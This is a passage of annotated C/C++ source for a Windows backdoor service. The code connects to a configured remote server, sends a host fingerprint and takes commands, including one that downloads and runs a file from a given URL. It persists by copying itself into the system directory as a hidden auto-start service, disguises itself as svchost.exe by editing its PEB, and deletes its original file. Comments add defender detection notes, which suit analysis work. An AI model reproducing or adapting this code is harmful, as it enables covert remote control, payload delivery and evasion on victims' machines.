memset(url,0,256);
strcpy(url,strchr(cmd,':')+1);
char seps[]= "/";
char *token;
char *file;
char myURL[MAX_PATH] ={0};
char myFILE[MAX_PATH] = {0};
strcpy(myURL,url);
token=strtok(myURL,seps);
while(token!=NULL)
{
file=token;
token=strtok(NULL,seps);
}
GetTempPath(MAX_PATH,myFILE);
strcat(myFILE, "\\");
strcat(myFILE, file);
HRESULT hr;
hr = URLDownloadToFile(0, url, myFILE, 0, 0);
if(hr!=S_OK)
return FALSE;
PROCESS_INFORMATION PI;
STARTUPINFO SI;
memset(&SI, 0, sizeof(SI));
SI.cb = sizeof(SI);
CreateProcess(myFILE, NULL, NULL, NULL, FALSE,NORMAL_PRIORITY_CLASS, NULL, NULL, &SI, &PI);
SC_HANDLE service, scm;
scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
service = OpenService(scm, modify_data.ws_svcname,SERVICE_ALL_ACCESS | DELETE);
DeleteService(service);
exit(0);
ExitProcess(0);
return TRUE;
}
if (strstr(cmd,"REMOVE") != NULL)
{
SC_HANDLE service, scm;
scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
service = OpenService(scm, modify_data.ws_svcname,SERVICE_ALL_ACCESS | DELETE);
DeleteService(service);
exit(0);
ExitProcess(0);
return TRUE;
}
return FALSE;
}
/*
 * _GetSysInfo: host-fingerprint message sent right after connecting.
 * Builds "VERSONEXc:<ver>|<MiB>|<cpu>" from the OS version numbers, the
 * physical memory total and the CPU name read from the registry, and sends
 * it (including its terminating NUL) on hSock.
 * The return values of GetVersionEx, RegQueryValueEx and send are ignored.
 * Defender note: the constant "VERSONEXc:" prefix on the first outbound
 * message of every session is a usable network signature.
 */
void _GetSysInfo(SOCKET hSock)
{
// ver stays -1 unless the major/minor pair is one of the three handled below.
int ver=-1;
CString SendData;
OSVERSIONINFO osver = {sizeof(OSVERSIONINFO)};
GetVersionEx(&osver);
// 5.0 -> 0
if (osver.dwMajorVersion == 5 && osver.dwMinorVersion == 0)
{
ver=0;
}
// 5.1 -> 2 when the CSD string contains "Service", "Pack" and "2" (each
// checked independently, anywhere in the string), otherwise 1.
else if (osver.dwMajorVersion == 5 && osver.dwMinorVersion == 1)
{
CString m_stServPack = CString (osver.szCSDVersion);
m_stServPack.FreeExtra ();
if (m_stServPack.Find("Service") >=0 &&m_stServPack.Find("Pack") >=0 &&m_stServPack.Find("2") >=0)
ver=2;
else
ver=1;
}
// 5.2 -> 3
else if (osver.dwMajorVersion == 5 && osver.dwMinorVersion == 2)
ver=3;
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
// CPUInfo is zero-filled so an absent or unterminated registry value still
// yields a terminated (possibly empty) string below.
char CPUInfo[MAX_PATH]={0};
char SubKey[MAX_PATH]={0};
strcpy(SubKey,"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0");
HKEY hKey;
// KEY_ALL_ACCESS is requested for a read-only query - far more than needed;
// if the open fails for any reason the CPU field is simply left empty.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
{
DWORD dwType;
// Query is bounded to 200 bytes although CPUInfo holds MAX_PATH bytes.
DWORD dwSize=200;
RegQueryValueEx(hKey,"ProcessorNameString",NULL,&dwType,(BYTE *)CPUInfo,&dwSize);
RegCloseKey(hKey);
}
// dwTotalPhys/1024/1024+1: total physical memory in MiB, plus one.
// dwTotalPhys is a SIZE_T printed with %d - presumably fine for the 32-bit
// build this file targets (see the inline asm elsewhere), confirm if ported.
SendData.Format("VERSONEXc:%d|%d|%s",ver,mem.dwTotalPhys/1024/1024+1,CPUInfo);
// GetLength()+1 sends the terminating NUL as part of the message.
send(hSock,SendData.GetBuffer(0),SendData.GetLength()+1,0);
}
/*
 * _ConnectServer: one session with the remote peer named in modify_data.
 * Resolves modify_data.url (dotted-quad first, then gethostbyname), connects
 * to modify_data.port, sends the host fingerprint (_GetSysInfo), then loops:
 * wait for readability, recv up to 512 bytes, pass the buffer to _ExplainCmd
 * and answer "OK" when it returns TRUE. Returns when the peer closes, when
 * select fails, or when the "OK" send fails with anything other than
 * WSAEWOULDBLOCK. ServiceMain calls this again 3 s after every return.
 * Nothing here authenticates the peer: whoever answers for the configured
 * name gets to issue commands. Defender note: the fixed 500 ms pause after
 * each message and the literal "OK" reply are behavioural indicators.
 */
void _ConnectServer()
{
WSADATA Data;
// Return value unchecked; requests 2.1 here, while ServiceMain asks for 2.2.
WSAStartup(MAKEWORD(2, 1), &Data);
int num=0;
char buf[512];
memset(buf,0,512);
SOCKET sc;
SOCKADDR_IN saddr;
saddr.sin_family = AF_INET;
saddr.sin_port = htons(modify_data.port);
saddr.sin_addr.s_addr = inet_addr(modify_data.url);
// INADDR_NONE means "not a dotted quad" (it is also what 255.255.255.255
// parses to), so fall back to a name lookup.
if (saddr.sin_addr.s_addr == INADDR_NONE)
{
struct hostent *hp = NULL;
if ((hp = gethostbyname(modify_data.url)) != NULL)
{
memcpy(&(saddr.sin_addr), hp->h_addr, hp->h_length);
saddr.sin_family = hp->h_addrtype;
}
else
{
// Unresolvable name: give up this session (no socket has been created yet).
return;
}
}
// NOTE(review): socket() signals failure with INVALID_SOCKET, not
// SOCKET_ERROR, so this comparison does not detect a failed socket().
if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR) return;
// A failed connect returns without closing sc.
if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR) return;
_GetSysInfo(sc);
while(1)
{
fd_set FdRead;
FD_ZERO(&FdRead);
FD_SET(sc,&FdRead);
// NULL timeout: blocks until sc is readable or select fails, so Er==0 is
// not a reachable outcome here.
int Er=select(sc+1, &FdRead, NULL, NULL, NULL);
if((Er==SOCKET_ERROR) || (Er==0)) break;
if(FD_ISSET(sc,&FdRead))
{
// Up to 512 bytes; a full 512-byte read leaves buf without a NUL, yet
// _ExplainCmd treats it as a C string (strstr/strchr, see its tail above).
num=recv(sc,buf,512,0);
// 0 = peer closed, <0 = error: end the session.
if(num<=0)
break;
if (_ExplainCmd(buf))
if (send(sc,"OK",2,0) == SOCKET_ERROR)
// sc is never switched to non-blocking in this function, so in practice
// any send error takes this branch.
if(WSAGetLastError()!=WSAEWOULDBLOCK)
{
closesocket(sc);
return;
}
}
// Clear between messages so a shorter next message is not followed by
// stale bytes from the previous one.
memset(buf,0,512);
Sleep(500);
}
// closesocket is called twice on the same handle; the second call acts on
// an already-closed socket.
closesocket(sc);
closesocket(sc);
return;
}
// What follows is the service scaffolding (status record, control handler,
// ServiceMain); it follows the fixed SCM pattern. [Original comment,
// translated: "Below is the service shell. Not much to explain; the format
// is fixed."]
// srvStatus: the status record reported to the SCM by SvcCtrlFnct/ServiceMain.
static SERVICE_STATUS srvStatus;
// hSrv: handle returned by RegisterServiceCtrlHandler in ServiceMain.
static SERVICE_STATUS_HANDLE hSrv;
/*
 * SvcCtrlFnct: SCM control handler registered by ServiceMain.
 * For each handled control it reports the matching *_PENDING state, waits
 * 500 ms, sets the final state, and the trailing SetServiceStatus reports it.
 * Only the status record is touched: nothing signals the worker loop in
 * ServiceMain, whose while(1) has no exit condition, so STOP and SHUTDOWN
 * are acknowledged to the SCM while the connect loop keeps running.
 * There is no default case: an unknown control code reaches the final
 * SetServiceStatus with the record unchanged.
 */
static void __stdcall SvcCtrlFnct(DWORD CtrlCode)
{
switch(CtrlCode)
{
// STOP and SHUTDOWN are handled identically.
case SERVICE_CONTROL_STOP:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
break;
case SERVICE_CONTROL_SHUTDOWN:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
break;
case SERVICE_CONTROL_PAUSE:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_PAUSE_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_CONTINUE_PENDING;
SetServiceStatus(hSrv,&srvStatus);
Sleep(500);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_RUNNING;
break;
}
// Report whatever state the case above left in srvStatus.
SetServiceStatus(hSrv,&srvStatus);
}
/*
 * service_is_exist: TRUE when
 * HKLM\SYSTEM\CurrentControlSet\Services\<modify_data.ws_svcname> can be
 * opened with KEY_ALL_ACCESS. Any failure - key absent or the caller lacking
 * those rights - is reported as FALSE, and a successful open leaks hKey
 * (no RegCloseKey). WinMain uses the answer to choose between running as the
 * installed service and installing it.
 * ws_svcname is appended with strcat into a MAX_PATH buffer without a length
 * check; its length is defined elsewhere.
 */
static BOOL service_is_exist()
{
char SubKey[MAX_PATH]={0};
strcpy(SubKey,"SYSTEM\\CurrentControlSet\\Services\\");
strcat(SubKey,modify_data.ws_svcname);
HKEY hKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
return TRUE;
else
return FALSE;
}
// Set by RunService when it copied the running image into the system
// directory; WinMain then calls _DeleteMe() to remove the original.
static BOOL fDelete_Me=FALSE;
/*
 * RunService: install this executable as an auto-start service and start it.
 * m_ServiceName / m_DisplayName go to CreateService; m_Description is written
 * as the "Description" value under the service's registry key.
 * Steps as written:
 *   1. If the running image is not already under the system directory, copy
 *      it there (appending ".exe" when the file title has none), point
 *      FilePath at the copy and set fDelete_Me so WinMain removes the
 *      original afterwards.
 *   2. Mark the service binary hidden + system.
 *   3. CreateService (own process, auto start, interactive). If it already
 *      exists, open it instead; StartService is then issued twice on that
 *      path (once in the branch, once after it).
 *   4. Set the Description value directly in the registry.
 * Defender note: the persistence indicators are a process copying its own
 * image into the system directory, setting hidden|system on it, and
 * registering an auto-start service whose binary path is that copy.
 * Buffer handling is unbounded throughout: FileTitle is 80 bytes and gets
 * ".exe" appended, SystemPath and Desc grow by strcat without length checks,
 * and no return value except CreateService/OpenService/StartService is used.
 */
static void RunService(char *m_ServiceName,char *m_DisplayName,char *m_Description)
{
char FilePath[MAX_PATH];
GetModuleFileName(NULL,FilePath,MAX_PATH);
///*
char SystemPath[MAX_PATH];
GetSystemDirectory(SystemPath,MAX_PATH);
// "Already installed" means FilePath starts with the system directory path.
if (strncmp(SystemPath,FilePath,strlen(SystemPath)) != 0)
{
char FileTitle[80];
GetFileTitle(FilePath,FileTitle,80);
if (strstr(FileTitle,".exe") == NULL && strstr(FileTitle,".EXE") == NULL)
strcat(FileTitle,".exe");
strcat(SystemPath,"\\");
strcat(SystemPath,FileTitle);
// bFailIfExists=FALSE: overwrites an existing file; result ignored.
CopyFile(FilePath,SystemPath,FALSE);
memset(FilePath,0,MAX_PATH);
strcpy(FilePath,SystemPath);
fDelete_Me = TRUE;
}
SetFileAttributes (FilePath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
//*/
char Desc[MAX_PATH];
HKEY key=NULL;
SC_HANDLE newService=NULL, scm=NULL;
// SEH try/finally: __leave jumps to the handle cleanup below.
__try
{
scm = OpenSCManager(0, 0,SC_MANAGER_ALL_ACCESS);
if (!scm)
__leave;
newService = CreateService(
scm, m_ServiceName,
m_DisplayName,
// SERVICE_INTERACTIVE_PROCESS is only valid together with the LocalSystem
// account, which the NULL account argument below selects.
SERVICE_ALL_ACCESS|SERVICE_INTERACTIVE_PROCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
// Startup failures are not logged by the SCM.
SERVICE_ERROR_IGNORE,
FilePath,
NULL, NULL, NULL, NULL, NULL);
if (newService == NULL)
{
if (GetLastError() == ERROR_SERVICE_EXISTS)
{
newService = OpenService(scm,m_ServiceName,SERVICE_ALL_ACCESS);
if (newService==NULL)
__leave;
else
// First StartService on the already-existing path; repeated just below.
StartService(newService,0, 0);
}
}
// Reached with newService == NULL when CreateService failed for a reason
// other than ERROR_SERVICE_EXISTS; StartService then fails and we leave.
if (!StartService(newService,0, 0))
__leave;
strcpy(Desc,"SYSTEM\\CurrentControlSet\\Services\\");
strcat(Desc,m_ServiceName);
// RegOpenKey result unchecked; lstrlen excludes the NUL, so the REG_SZ
// data is stored without its terminator.
RegOpenKey(HKEY_LOCAL_MACHINE,Desc,&key);
RegSetValueEx(key,"Description",0,REG_SZ,(CONST BYTE*)m_Description,lstrlen(m_Description));
}
__finally
{
if (newService!=NULL)
CloseServiceHandle(newService);
if (scm!=NULL)
CloseServiceHandle(scm);
if (key!=NULL)
RegCloseKey(key);
}
}
/*
 * ByPassFireWall: process masquerade by editing the process's own PEB
 * (32-bit only: fs:[30h] and fixed structure offsets).
 * Builds "<system dir>\svchost.exe" as an ASCII string, widens it byte by
 * byte into the static UTF-16 buffer modulepath, then rewrites the
 * ImagePathName and CommandLine strings of the process parameters - and, in
 * the first asm stanza, a third location the original leaves unlabelled
 * (presumably a loader-list entry; confirm against the PEB layout) - to point
 * at modulepath with a hard-coded length of 0x60 bytes, whatever the real
 * string length is.
 * Only what the process reports about itself changes; the file on disk and
 * the mapped image do not. Defender note: a mismatch between the
 * PEB-reported image path / command line and the path of the actually
 * mapped main module is the detection handle for this technique.
 * Buffer notes: szpath is 64 bytes, so GetSystemDirectory(szpath,64) plus
 * strcat("\\svchost.exe") is unchecked, and the widening loop copies all
 * 64 bytes of szpath whether or not they were written.
 */
void ByPassFireWall()
{
char szpath[64];
// Must outlive this function: the PEB is left pointing at it (see the
// "lea ebx,modulepath" / "mov [...],ebx" pairs below).  [Original comment:
// "must be a global variable - why?"]
static char modulepath[128];
GetSystemDirectory(szpath,64);
strcat(szpath,"\\svchost.exe");
// Hand-rolled widening to UTF-16: each byte followed by a zero byte. Only
// correct for ASCII bytes.  [Original comment: "convert to Unicode chars"]
for (int ii=0;ii<64;ii++)
{
modulepath[ii*2] = szpath[ii];
modulepath[ii*2+1] = 0;
}
__asm
{
// fs:[30h] is the PEB; the two +0xC dereferences below are unlabelled in
// the original.
MOV EAX, fs:[30h]
MOV EAX, [EAX+0xC]
MOV EAX, [EAX+0xC]
lea ebx,modulepath
mov WORD ptr[EAX+0x24],0x60
mov [EAX+0x28],ebx
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10]
lea EAX,[EAX+0x3c]
lea ebx,modulepath
mov [eax],ebx //ImagePathName->Buffer
mov WORD ptr[eax-4],0x60 //ImagePathName->Length
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10] //peb->_RTL_USER_PROCESS_PARAMETERS
lea eax,[EAX+0x44] //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
lea ebx,modulepath
mov [eax],ebx //CommandLine-->Buffer
mov WORD ptr[eax-4],0x60 //CommandLine-->Length
}
}
/*
 * ServiceMain: SCM entry point, dispatched from WinMain's service table.
 * Registers SvcCtrlFnct, reports START_PENDING then RUNNING, initialises
 * Winsock (2.2 here; _ConnectServer calls WSAStartup again with 2.1), clears
 * hThread[0..7] (declared elsewhere), calls HideCurrentProcess() (defined
 * elsewhere) and ByPassFireWall(), then loops forever: StopFlag = 1, one
 * _ConnectServer() session, 3 s pause. The STOP_PENDING/STOPPED reporting
 * after the loop is unreachable, which is why SvcCtrlFnct's STOP handling
 * never actually ends the work.
 * Inconsistencies visible here: dwServiceType is SERVICE_WIN32_SHARE_PROCESS
 * while RunService registered the service as SERVICE_WIN32_OWN_PROCESS, and
 * argv is declared wchar_t* although the rest of the file is ANSI (argv and
 * dwargc are never read).
 * Defender note: a new outbound connection attempt roughly every 3 s after
 * each dropped session is the beaconing pattern to look for.
 */
void ServiceMain(DWORD dwargc,wchar_t* argv[])
{
hSrv=RegisterServiceCtrlHandler(modify_data.ws_svcname,SvcCtrlFnct);
srvStatus.dwServiceType=SERVICE_WIN32_SHARE_PROCESS;
srvStatus.dwControlsAccepted=SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;
srvStatus.dwWin32ExitCode=NO_ERROR;
srvStatus.dwWaitHint=2000;
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_START_PENDING;
SetServiceStatus(hSrv,&srvStatus);
srvStatus.dwCheckPoint=0;
Sleep(500);
srvStatus.dwCurrentState=SERVICE_RUNNING;
SetServiceStatus(hSrv,&srvStatus);
WSADATA Data;
WSAStartup(MAKEWORD(2, 2), &Data);
for(int i =0;i <8; i++)
{
hThread[i]=NULL;
}
HideCurrentProcess();
ByPassFireWall();
// No exit condition: the service only stops when the process is killed.
while(1)
{
StopFlag = 1;
_ConnectServer();
Sleep(3000);
}
// Unreachable: the loop above never breaks.
srvStatus.dwCheckPoint=1;
srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
SetServiceStatus(hSrv,&srvStatus);
srvStatus.dwCheckPoint=0;
srvStatus.dwCurrentState=SERVICE_STOPPED;
SetServiceStatus(hSrv,&srvStatus);
return;
}
////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////
//////////////////////////////////
///////////////////////////////
/*
 * WinMain: choose between running as the installed service and installing.
 * If the service's registry key exists (service_is_exist), hand control to
 * the SCM dispatcher with ServiceMain; the dispatcher's return value is not
 * checked, so when launched interactively in that state the call fails and
 * WinMain just returns 0. Otherwise RunService installs and starts the
 * service, and if that copied the image into the system directory
 * (fDelete_Me) _DeleteMe() (defined elsewhere) removes the original and the
 * process exits. hInstance, hPrevInstance, lpCmdLine and nCmdShow are unused.
 */
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
if (service_is_exist())
{
// Single-entry table terminated by {NULL,NULL}, as the dispatcher requires.
SERVICE_TABLE_ENTRY serviceTable[] =
{
{modify_data.ws_svcname,(LPSERVICE_MAIN_FUNCTION) ServiceMain},
{NULL,NULL}
};
StartServiceCtrlDispatcher(serviceTable);
}
else
{
RunService(modify_data.ws_svcname,modify_data.ws_svcdisplay ,modify_data.ws_svcdesc);
if (fDelete_Me)
{
_DeleteMe();
exit(0);
}
}
return 0;
}